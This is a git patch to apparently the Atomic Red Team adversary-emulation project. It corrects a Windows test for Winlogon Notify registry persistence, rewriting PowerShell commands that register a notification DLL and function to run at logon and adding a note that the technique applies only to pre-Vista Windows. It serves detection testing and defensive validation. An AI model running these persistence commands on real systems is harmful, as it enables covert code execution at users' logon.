From df3e84d861985abe4774696cc1527bd3ffa99ba1 Mon Sep 17 00:00:00 2001 From: hRun Date: Sat, 24 Jun 2023 01:09:45 +0200 Subject: [PATCH] Correct T1547.004 Winlogon Notification test (#2470) * Corrected T1547.004 Winlogon Notification test * Added hint on deprecation --------- Co-authored-by: Hare Sudhan --- atomics/T1547.004/T1547.004.md | 14 ++++++++++---- atomics/T1547.004/T1547.004.yaml | 15 ++++++++++++--- 2 files changed, 22 insertions(+), 7 deletions(-) diff --git a/atomics/T1547.004/T1547.004.md b/atomics/T1547.004/T1547.004.md index 477357c4..c03346b8 100644 --- a/atomics/T1547.004/T1547.004.md +++ b/atomics/T1547.004/T1547.004.md @@ -106,7 +106,9 @@ Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Wi ## Atomic Test #3 - Winlogon Notify Key Logon Persistence - PowerShell PowerShell code to set Winlogon Notify key to execute a notification package DLL at logon. -Upon successful execution, PowerShell will modify a registry value to execute atomicNotificationPackage.dll upon logon/logoff. +Upon successful execution, PowerShell will modify a registry value to execute atomicNotificationPackage.dll upon logon. + +Please note that Winlogon Notifications have been removed as of Windows Vista / Windows Server 2008 and that this test thus only applies to erlier versions of Windows. **Supported Platforms:** Windows @@ -121,19 +123,23 @@ Upon successful execution, PowerShell will modify a registry value to execute at | Name | Description | Type | Default Value | |------|-------------|------|---------------| | binary_to_execute | Path of notification package to execute | path | C:\Windows\Temp\atomicNotificationPackage.dll| +| function_to_execute | Function in notification package to execute | string | AtomicTestFunction| #### Attack Commands: Run with `powershell`! ```powershell -New-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" -Force -Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" "logon" "#{binary_to_execute}" -Force +New-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\AtomicRedTeam" -Force +Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\AtomicRedTeam" "DllName" "#{binary_to_execute}" -Type ExpandString -Force +Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\AtomicRedTeam" "Logon" "#{function_to_execute}" -Force +Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\AtomicRedTeam" "Impersonate" 1 -Type DWord -Force +Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\AtomicRedTeam" "Asynchronous" 0 -Type DWord -Force ``` #### Cleanup Commands: ```powershell -Remove-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" -Force -ErrorAction Ignore +Remove-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\AtomicRedTeam" -Force -ErrorAction Ignore ``` diff --git a/atomics/T1547.004/T1547.004.yaml b/atomics/T1547.004/T1547.004.yaml index a4a6ee97..0347de9d 100644 --- a/atomics/T1547.004/T1547.004.yaml +++ b/atomics/T1547.004/T1547.004.yaml @@ -47,7 +47,9 @@ atomic_tests: description: | PowerShell code to set Winlogon Notify key to execute a notification package DLL at logon. - Upon successful execution, PowerShell will modify a registry value to execute atomicNotificationPackage.dll upon logon/logoff. + Upon successful execution, PowerShell will modify a registry value to execute atomicNotificationPackage.dll upon logon. + + Please note that Winlogon Notifications have been removed as of Windows Vista / Windows Server 2008 and that this test thus only applies to erlier versions of Windows. supported_platforms: - windows input_arguments: @@ -55,10 +57,17 @@ atomic_tests: description: Path of notification package to execute type: path default: C:\Windows\Temp\atomicNotificationPackage.dll + function_to_execute: + description: Function in notification package to execute + type: string + default: AtomicTestFunction executor: command: | - New-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" -Force - Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" "logon" "#{binary_to_execute}" -Force + New-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\AtomicRedTeam" -Force + Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\AtomicRedTeam" "DllName" "#{binary_to_execute}" -Type ExpandString -Force + Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\AtomicRedTeam" "Logon" "#{function_to_execute}" -Force + Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\AtomicRedTeam" "Impersonate" 1 -Type DWord -Force + Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\AtomicRedTeam" "Asynchronous" 0 -Type DWord -Force cleanup_command: | Remove-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" -Force -ErrorAction Ignore name: powershell